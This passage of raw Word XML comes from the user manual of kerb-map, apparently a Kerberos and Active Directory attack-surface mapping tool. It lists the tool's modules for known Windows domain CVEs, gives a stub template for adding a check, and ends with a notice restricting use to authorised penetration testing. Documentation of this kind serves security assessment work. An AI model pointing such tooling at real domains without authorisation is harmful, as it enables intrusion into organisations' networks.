                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── printnightmare.py     # CVE-2021-1675 / CVE-2021-34527</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── petitpotam.py         # CVE-2021-36942</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── ms14_068.py           # CVE-2014-6324</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── gpp_passwords.py      # MS14-025</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── bronze_bit.py         # CVE-2020-17049</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── certifried.py         # CVE-2022-26923</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   └── ldap_signing.py       # LDAP signing enforcement check</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">└── output/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    ├── terminal.py           # Rich terminal formatter</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    ├── json_export.py        # Structured JSON writer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    ├── bloodhound_export.py  # BloodHound JSON/ZIP generator</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    └── history.py            # SQLite scan history manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 12 — Extending kerb-map</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">12.1 Adding a New CVE Module</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">To add a new CVE check, create a Python file in the cves/ directory that follows the standard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 cves/new_vuln.py</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">from core.ldap_client import LDAPClient</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">from core.scorer import Finding</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">class NewVulnCheck:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    """CVE-YYYY-XXXXX: Description of the vulnerability."""</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    NAME = 'new_vuln'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    CVE = 'CVE-YYYY-XXXXX'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    AGGRESSIVE = False</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    def __init__(self, ldap: LDAPClient):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        self.ldap = ldap</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    def check(self) -&gt; list[Finding]:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        results = self.ldap.search('(objectClass=...)', ['attr1', 'attr2'])</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        findings = []</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        for entry in results:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">            if self._is_vulnerable(entry):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">                findings.append(Finding(</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">                    type='new_vuln', score=80, target=entry.name,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">                    details='Explanation of why this is vulnerable',</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">                    next_step='command to exploit or verify'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">                ))</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        return findings</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    def _is_vulnerable(self, entry) -&gt; bool:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        return False</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Then register the module in kerb-map.py by adding it to the CVE_MODULES list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">12.2 Adding a New Enumeration Module</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumeration modules follow the same pattern but are placed in the modules/ directory. They should return a list of Finding objects with appropriate scores and next-step commands. Register the module in the ENUM_MODULES list and add a CLI flag in the argument parser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">12.3 Customising the Scorer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The scoring weights are defined in config/scoring.py. To adjust the priority of specific finding types, modify the weight constants. The scorer uses a weighted sum approach, so changing a single weight shifts that finding type relative to all others. After modifying weights, run the included test suite to verify that the priority order matches your expected engagement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2D2D2D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">python -m pytest tests/test_scorer.py -v</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 13 — Legal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C0000" w:sz="12"/>
              <w:bottom w:val="single" w:color="DDDDDD" w:sz="1"/>
              <w:right w:val="single" w:color="DDDDDD" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFF5F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="CC0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">IMPORTANT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">kerb-map is designed exclusively for authorised penetration testing, red team engagements, and security assessments conducted with explicit written permission from the system owner.</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Unauthorised use of kerb-map against systems you do not own or do not have explicit permission to test is illegal in most jurisdictions and may violate the Computer Fraud and Abuse Act (CFAA), the Computer Misuse Act, or equivalent legislation in your country.</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The authors of kerb-map accept no liability for misuse of this tool. It is the operator’s sole responsibility to ensure that all testing is conducted within the scope of a valid authorisation agreement.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By using kerb-map, you acknowledge that you have obtained proper authorisation and that you understand the potential impact of running security scanning tools against production Active Directory environments.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">For questions about responsible use, licensing, or contributions, refer to the project’s README.md or open an issue on the project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0"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">kerb-map v1.1 — For authorized engagements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i/>
        <w:iCs/>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">KERB-MAP User Manual — Kerberos Attack Surface Mapper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2026-03-19T09:52:42.635Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-19T09:52:42.636Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>